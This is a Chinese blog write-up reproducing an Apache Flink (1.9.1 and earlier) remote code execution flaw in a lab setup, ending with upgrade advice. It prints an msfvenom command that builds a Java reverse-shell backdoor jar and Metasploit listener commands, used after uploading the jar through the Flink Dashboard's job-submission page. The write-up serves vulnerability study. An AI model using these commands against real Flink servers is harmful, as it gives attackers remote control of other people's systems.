【漏洞复现】Apache Flink RCE 漏洞复现

本文详细介绍了Apache Flink的一个安全漏洞,该漏洞允许攻击者通过上传恶意jar包在Flink Dashboard上实现远程代码执行。影响范围包括Apache Flink 1.9.1及以下版本。复现步骤包括生成Java后门jar包,上传到Flink的SubmitNewJob模块,通过监听器捕获反弹的shell。修复建议是尽快升级到最新版本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

参考:https://blog.csdn.net/weixin_45492773/article/details/105975768

0x00 简介

Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

0x01 漏洞概述

攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。

0x02 影响版本

Apache Flink <=1.9.1

0x03 环境搭建

目标机:192.168.72.128(centos7)+Flink 1.9.1+jdk8
攻击机:192.168.72.138(kali)

(1)自行百度安装jdk8,下载Apache Flink 1.9.1安装包并解压,解压后进入目录下bin文件夹,运行./start-cluster.sh

root@root:~# wget https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
root@root:~# tar  –zxvf  flink-1.9.1-bin-scala_2.11.tgz
root@root:~# cd /flink-1.9.1
root@root:~# ./start-cluster.sh

(3)Flink启动之后,默认web 端口8081,访问http://IP:8081/
在这里插入图片描述

0x04 复现

(1)kali生成jar后门包

root@kali:~# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.72.138 LPORT=4444 -f jar > rce.jar

(2)点击Submit New Job模块+ Add New上传
在这里插入图片描述(3)设置监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload java/shell/reverse_tcp 
msf5 exploit(multi/handler) > set LHOST 192.168.72.138
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > run

(4)展开jar包,点击Submit,反弹成功
在这里插入图片描述在这里插入图片描述

0x05 修复建议

升级至最新版本!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值